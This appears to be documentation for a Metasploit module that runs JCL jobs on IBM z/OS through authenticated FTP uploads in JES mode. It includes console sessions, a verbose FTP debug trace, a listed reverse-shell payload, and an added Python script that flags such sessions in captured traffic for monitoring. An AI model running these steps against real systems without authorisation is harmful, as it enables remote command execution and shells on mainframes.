z/OS JCL authorized FTP-based command execution - hints & tips

In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.

## Vulnerable Application

This exploit was tested on the FTP daemons for z/OS version 1.13 / 2.1.

## Payloads

If the exploit works, any JCL the user has rights to submit can be submitted. See the cmd type payloads under mainframe with jcl in the payload name, e.g.:

```
msf exploit(ftp_jcl_creds) > show payloads

Compatible Payloads
===================

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   cmd/mainframe/generic_jcl                         normal  Generic JCL Test for Mainframe Exploits
   cmd/mainframe/reverse_shell_jcl                   normal  Z/OS (MVS) Command Shell, Reverse TCP
```

## Verification Steps

A successful check of the exploit will look like this:

```
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info

       Name: FTP JCL Execution
     Module: exploit/mainframe/ftp/ftp_jcl_creds
   Platform: Mainframe
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-05-12

Available targets:
  Id  Name
  --  ----
  0   auto

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  password         no        The password for the specified username
  FTPUSER  ftptest          no        The username to authenticate as
  RHOST    10.10.10.1       yes       The target address
  RPORT    21               yes       The target port
  SLEEP    5                no        Time to wait before checking if job has completed.

Payload information:

Description:
  Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
  valid credentials on the target system

msf exploit(ftp_jcl_creds) > check

[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
```

## Debugging

If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run it again. On a vulnerable system, the output should look similar to the following:

```
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check

[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on.  Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
```

## Notes

The job run will leave a job log for the credentials used.
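
For monitoring, the control-channel sequence shown in the debug trace (`SITE FILE=JES`, a `200` reply, then an upload) can be flagged from captured FTP commands. The following is an added example, not part of the module or its documentation; the `(session, direction, line)` record format, the name `jes_activity`, and the sample sessions are constructed for illustration, and it assumes that an upload (`STOR`) made while in JES mode is what submits the job.

```python
import re

# Matches SITE FILE=JES as in the trace above; FILETYPE is the long keyword form.
SITE_RE = re.compile(r"^SITE\s+.*\bFILE(?:TYPE)?\s*=\s*(\w+)", re.I)

# Constructed sample records: (session id, direction, control-channel line).
SAMPLE = [
    ("s1", "send", "USER ftptest"),
    ("s1", "recv", "230 FTPTEST is logged on."),
    ("s1", "send", "site file=jes"),
    ("s1", "recv", "200 SITE command was accepted"),
    ("s1", "send", "STOR JOB1"),
    ("s2", "send", "USER batch01"),
    ("s2", "send", "SITE FILETYPE=SEQ"),
    ("s2", "recv", "200 SITE command was accepted"),
    ("s2", "send", "STOR PAYROLL.DATA"),
    ("s3", "send", "USER guest"),
    ("s3", "send", "SITE FILE=JES"),
    ("s3", "recv", "500 constructed rejection reply"),
]


def jes_activity(records):
    """Report sessions that asked for JES mode, whether it was accepted, and uploads made in it."""
    state, findings = {}, {}
    for sid, direction, line in records:
        s = state.setdefault(sid, {"user": None, "pending": None, "jes": False})
        if direction == "send":
            verb = (line.split(None, 1) or [""])[0].upper()
            site = SITE_RE.match(line)
            if verb == "USER":
                s["user"] = line.split(None, 1)[-1]
            elif site:
                s["pending"] = site.group(1).upper()  # wait for the server's reply
                if s["pending"] == "JES":
                    findings.setdefault(sid, {"user": s["user"], "accepted": False, "submits": []})
            elif verb == "STOR" and s["jes"]:
                # In JES mode the uploaded file is submitted as a job.
                findings[sid]["submits"].append(line.split(None, 1)[-1])
        elif s["pending"]:
            if line.startswith("200"):
                s["jes"] = s["pending"] == "JES"  # a later FILETYPE=SEQ leaves JES mode
                if s["jes"]:
                    findings[sid]["accepted"] = True
            s["pending"] = None
    return findings


if __name__ == "__main__":
    for sid, finding in jes_activity(SAMPLE).items():
        print(sid, finding)
```

Sessions that appear in the result can then be matched against the job log that the submitted job leaves for the same user ID.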